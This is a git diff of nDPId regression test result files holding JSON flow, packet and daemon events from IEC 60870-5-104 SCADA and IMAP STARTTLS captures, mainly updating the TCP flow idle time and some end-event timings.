+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-data-len":343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1219992852463} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":120,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992935600,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":147,"packets-processed":147,"total-skipped-flows":0,"total-l4-data-len":748,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1219993055118} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 147/147 diff --git a/test/results/imap-starttls.pcap.out b/test/results/imap-starttls.pcap.out index 1a79acf73..af6bf749c 100644 --- a/test/results/imap-starttls.pcap.out +++ b/test/results/imap-starttls.pcap.out @@ -1,11 +1,11 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imap-starttls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437584567812} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437584567812,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437584567812,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437584567812,"flow_last_seen":1437584567812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437584567812,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 